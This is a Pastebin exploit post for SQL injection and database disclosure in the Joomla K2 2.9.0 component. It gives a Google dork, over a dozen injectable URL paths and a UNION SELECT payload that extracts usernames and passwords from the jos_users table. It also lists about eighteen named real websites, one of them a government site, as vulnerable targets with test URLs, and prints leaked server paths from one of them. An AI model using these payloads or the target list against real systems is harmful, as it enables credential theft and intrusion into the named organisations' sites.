Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla K2 Components 2.9.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/02/2019
- # Vendor Homepage : getk2.org
- # Software Download Link : getk2.org/downloads/?f=K2_v2.9.0.zip
- # Software Information Link : extensions.joomla.org/extension/k2/
- # Software Version : 2.9.0 and previous versions.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_k2''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Old Similar CVE [ Only Version is Different ] : CVE-2009-2395
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The powerful award-winning content extension for Joomla with
- more than 3 million downloads (and counting)!
- K2 provides an out-of-the box integrated solution featuring rich content forms
- for items (think of Joomla articles with additional fields for article images, videos,
- image galleries and attachments), nested-level categories, tags, comments,
- a system to extend the item base form with additional fields (similar to CCK
- for those acquainted with Drupal), a powerful plugin API to extend item,
- category and user forms, ACL, frontend editing, sub-templates & a lot more!
- Using K2, you can transform your Joomla website to a news/magazine site
- with author blogs, product catalogs, work portfolio, knowledge base,
- download/document manager, directory listing, event listing & more,
- all this bundled under one package!
- ####################################################################
- # Impact :
- ***********
- Joomla K2 2.9.0 component for Joomla and other previous versions is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_k2&view=itemlist&category=[SQL Injection]
- /index.php/component/users/?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
- /index.php?option=com_k2&view=itemlist&task=category&id=[ID-NUMBER]:video&Itemid=[SQL Injection]
- /index.php?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
- /index.php?option=com_k2&view=item&layout=item&id=[SQLi]&Itemid=[SQL Injection]&lang=en
- /index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL Injection]
- /index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_k2&view=itemlist&task=user&id=[ID-NUMBER][TOPIC-NAME]&Itemid=[SQL Injection]
- /index.php?option=com_k2&view=item&id=[ID-NUMBER]:[TOPIC-NAME]&tmpl=component&print=[SQL Injection]
- /index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&Itemid=[SQL Injection]
- /index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&format=feed&type=atom&Itemid=[SQL Injection]
- /index.php?option=com_k2&view=itemlist&task=date&year=[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- # Example SQL Injection Payload :
- ******************************
- null'+and+1=2+union+select+1,concat(username,0x3a,password)KingSkrupellos,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
- null'+and+1=2+union+select+1,concat(username,0x3a,password)KingSkrupellos,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_k2/install.mysql.sql
- /administrator/components/com_k2/uninstall.mysql.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] personeriadebarranquilla.gov.co/index.php/component
- /users/?option=com_k2&view=itemlist&task=user&id=1%27
- [+] projectflooring.it/site/index.php?option=com_k2&view=
- itemlist&task=tag&tag=BATTENTI&Itemid=435%27
- [+] paolocalicchio.it/index.php?option=com_k2&view=
- itemlist&task=category&id=20:video&Itemid=175%27
- [+] davidblair.co.uk/index.php?option=com_k2&view=
- itemlist&task=user&id=62770%27
- [+] platinum-labs.com/index.php?option=com_k2&view=
- itemlist&task=user&id=325022%27
- [+] arieltheatre.ro/index.php?option=com_k2&view=
- itemlist&task=tag&tag=
- Ariana+Serban&format=feed&type=atom&Itemid=197%27
- [+] fototrogu.com/milos/index.php?option=com_k2&view=
- itemlist&task=user&id=64%3Amilos&Itemid=75%27
- [+] toldosypersianasagustinmartin.com/inicio/index.php?option=
- com_k2&view=item&id=20:cofre-t7-siplan&tmpl=component&print=1%27
- [+] irishpoolassociation.info/irishpoolsite/index.php?option=
- com_k2&view=item&layout=item&id=119&Itemid=234%27
- [+] inhousedesignco.com/index.php?option=
- com_k2&view=item&id=64%27
- [+] jeffreykentart.com/kentart/index.php?option=
- com_k2&view=itemlist&task=user&id=672%27
- [+] designlabinternational.com/DesignLABInternational/index.php?option=
- com_k2&view=item&layout=item&id=36&Itemid=17%27
- [+] code-ethiopia.org/index.php?option=
- com_k2&view=item&layout=item&id=27&Itemid=8%27
- [+] nokhba.ly/en/index.php/component/users//?option=
- com_k2&view=itemlist&task=user&id=4633%27
- [+] westrockcc.com/index.php?option=
- com_k2&view=item&id=12:wellness-centre-survey&Itemid=169%27
- [+] onecallventilation.com/main-page/index.php/component
- /users//?option=com_k2&view=itemlist&task=user&id=3823%27
- [+] forestalgarriga.com/index.php?option=
- com_k2&view=itemlist&task=user&id=1%27
- [+] feiraviva.com/novo/administrator/components/com_k2/install.mysql.sql
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Declaration of JParameter::loadSetupFile($path) should be
- compatible with JRegistry::loadSetupFile() in /home/personer
- /public_html/libraries/joomla/html/parameter.php on line 512
- Warning: Declaration of JCacheControllerPage::store($wrkarounds =
- true) should be compatible with JCacheController::store
- ($data, $id, $group = NULL) in /home/personer/public_html
- /libraries/joomla/cache/controller/page.php on line 199
- Warning: preg_replace(): The /e modifier is no longer supported,
- use preg_replace_callback instead in /home/personer/public_html
- /libraries/joomla/filter/input.php on line 652
- Warning: Use of undefined constant K2_JVERSION -
- assumed 'K2_JVERSION' (this will throw an Error in a future
- version of PHP) in /home/personer/public_html/components/com_k2/k2.php on line 13
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment